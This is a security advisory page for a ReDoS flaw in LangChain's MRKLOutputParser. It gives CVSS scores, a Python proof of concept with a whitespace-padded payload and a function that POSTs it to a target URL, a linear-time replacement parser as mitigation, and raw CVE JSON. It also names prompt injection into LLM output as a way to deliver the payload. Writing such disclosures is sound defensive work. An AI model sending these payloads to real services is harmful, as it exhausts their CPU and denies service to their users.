Security Vulnerability Report
CVE-2024-58340 CVSS 7.5 HIGH

Published: 2026-01-12 23:15:52
Last Modified: 2026-01-21 17:57:57

Description

LangChain versions up to and including 0.3.1 contain a regular expression denial-of-service (ReDoS) vulnerability in the MRKLOutputParser.parse() method (libs/langchain/langchain/agents/mrkl/output_parser.py). The parser applies a backtracking-prone regular expression when extracting tool actions from model output. An attacker who can supply or influence the parsed text (for example via prompt injection in downstream applications that pass LLM output directly into MRKLOutputParser.parse()) can trigger excessive CPU consumption by providing a crafted payload, causing significant parsing delays and a denial-of-service condition.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:langchain:langchain:*:*:*:*:*:*:*:* - VULNERABLE
LangChain <= 0.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import re
import time

import requests

# Vulnerable regex pattern from LangChain MRKLOutputParser
# This pattern has catastrophic backtracking issues
VULNERABLE_PATTERN = r'\s*\n?\s*Action:\s*(.+?)\n?\s*Action Input:\s*(.+?)(?:\n\s*\n?|\Z)'


# PoC payload that triggers ReDoS
# The many spaces cause the regex to backtrack exponentially
def generate_redos_payload(num_spaces=100):
    return f"""Thought: Let me help you
Action: calculator
Action Input: 1 + 1{' ' * num_spaces}Extra text that doesn't match"""


def test_redos():
    payload = generate_redos_payload(100)
    print(f"Testing payload length: {len(payload)} characters")
    start_time = time.time()
    try:
        # This will cause significant delay due to ReDoS
        match = re.search(VULNERABLE_PATTERN, payload, re.DOTALL)
        elapsed = time.time() - start_time
        print(f"Match completed in {elapsed:.4f} seconds")
    except Exception:
        elapsed = time.time() - start_time
        print(f"Regex timeout or error after {elapsed:.4f} seconds")


# Simulate HTTP request to vulnerable endpoint
def exploit_via_http(target_url):
    """
    Exploit the ReDoS vulnerability via HTTP request
    In real attack scenario, this would be sent to a LangChain application
    that processes LLM output with MRKLOutputParser
    """
    payload = generate_redos_payload(200)
    # Example POST request to vulnerable endpoint
    response = requests.post(
        target_url,
        json={'user_input': payload, 'use_parser': True},
        timeout=30
    )
    return response


if __name__ == "__main__":
    print("CVE-2024-58340 ReDoS PoC")
    print("=" * 50)
    test_redos()
```
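The mitigation side of the same Action / Action Input format, added here as an example and not code from LangChain or the advisory: fixed-prefix line matching replaces the backtracking regex, and a length cap is applied to the untrusted model output before any parsing. The function name, the 4096-character cap and the quote-stripping of the tool input are assumptions.

```python
# Added example (not LangChain's code): a linear-time replacement for the
# regex-based action extraction, with a length cap applied before parsing.
ACTION_PREFIX = "Action:"
INPUT_PREFIX = "Action Input:"
MAX_OUTPUT_CHARS = 4096  # assumption: cap on untrusted model output; tune per app


class OutputParserException(ValueError):
    """Raised when the model output carries no well-formed tool action."""


def parse_mrkl_action(text: str) -> tuple[str, str]:
    """Return (tool, tool_input) from MRKL-style model output.

    Each line is tested with str.startswith against a fixed prefix, so the
    cost is linear in the input length regardless of how much whitespace or
    trailing text an attacker pads the output with.
    """
    if len(text) > MAX_OUTPUT_CHARS:
        # Reject oversize output before doing any work on it.
        raise OutputParserException(
            f"model output is {len(text)} chars, limit is {MAX_OUTPUT_CHARS}"
        )
    tool = None
    tool_input = None
    for raw_line in text.splitlines():
        line = raw_line.strip()
        if tool is None and line.startswith(ACTION_PREFIX):
            tool = line[len(ACTION_PREFIX):].strip()
        elif tool is not None and line.startswith(INPUT_PREFIX):
            # Surrounding quotes are dropped (assumption about the tool format).
            tool_input = line[len(INPUT_PREFIX):].strip().strip('"')
            break  # only the first Action / Action Input pair is honoured
    if tool is None or tool_input is None:
        raise OutputParserException("no Action / Action Input pair found")
    return tool, tool_input


def padded_output(num_spaces: int) -> str:
    """Constructed sample mirroring the shape of the PoC payload above."""
    return ("Thought: Let me help you\nAction: calculator\n"
            f"Action Input: 1 + 1{' ' * num_spaces}Extra text")


if __name__ == "__main__":
    print(parse_mrkl_action(padded_output(100)))
    try:
        parse_mrkl_action(padded_output(100_000))
    except OutputParserException as exc:
        print("rejected:", exc)
```

Outputs that carry no tool action (for example a bare "Final Answer:" line) are rejected with the same exception, so callers get one failure path instead of a hang.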

References

https://github.com/langchain-ai/langchain (Product)
https://huntr.com/bounties/e7ece02c-d4bb-4166-8e08-6baf4f8845bb (Exploit, Issue Tracking, Third Party Advisory)
https://www.langchain.com/ (Product)
https://www.vulncheck.com/advisories/langchain-mrkloutputparser-redos (Third Party Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2024-58340",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-12T23:15:51.780",
    "lastModified": "2026-01-21T17:57:56.537",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "LangChain versions up to and including 0.3.1 contain a regular expression denial-of-service (ReDoS) vulnerability in the MRKLOutputParser.parse() method (libs/langchain/langchain/agents/mrkl/output_parser.py). The parser applies a backtracking-prone regular expression when extracting tool actions from model output. An attacker who can supply or influence the parsed text (for example via prompt injection in downstream applications that pass LLM output directly into MRKLOutputParser.parse()) can trigger excessive CPU consumption by providing a crafted payload, causing significant parsing delays and a denial-of-service condition."},
      {"lang": "es", "value": "Las versiones de LangChain hasta la 0.3.1 inclusive contienen una vulnerabilidad de denegación de servicio por expresión regular (ReDoS) en el método MRKLOutputParser.parse() (libs/langchain/langchain/agents/mrkl/output_parser.py). El analizador aplica una expresión regular propensa a retrocesos al extraer acciones de herramientas de la salida del modelo. Un atacante que puede suministrar o influir en el texto analizado (por ejemplo, mediante inyección de prompt en aplicaciones posteriores que pasan la salida del LLM directamente a MRKLOutputParser.parse()) puede desencadenar un consumo excesivo de CPU al proporcionar una carga útil manipulada, causando retrasos significativos en el análisis y una condición de denegación de servicio."}
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 8.7, "baseSeverity": "HIGH",
            "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE",
            "privilegesRequired": "NONE", "userInteraction": "NONE",
            "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5, "baseSeverity": "HIGH",
            "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE",
            "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1333"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langchain:langchain:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.3.1", "matchCriteriaId": "6E9D0E05-1453-4F45-BA4F-C188E1639974"}]}]}
    ],
    "references": [
      {"url": "https://github.com/langchain-ai/langchain", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://huntr.com/bounties/e7ece02c-d4bb-4166-8e08-6baf4f8845bb", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]},
      {"url": "https://www.langchain.com/", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://www.vulncheck.com/advisories/langchain-mrkloutputparser-redos", "source": "[email protected]", "tags": ["Third Party Advisory"]}
    ]
  }
}
```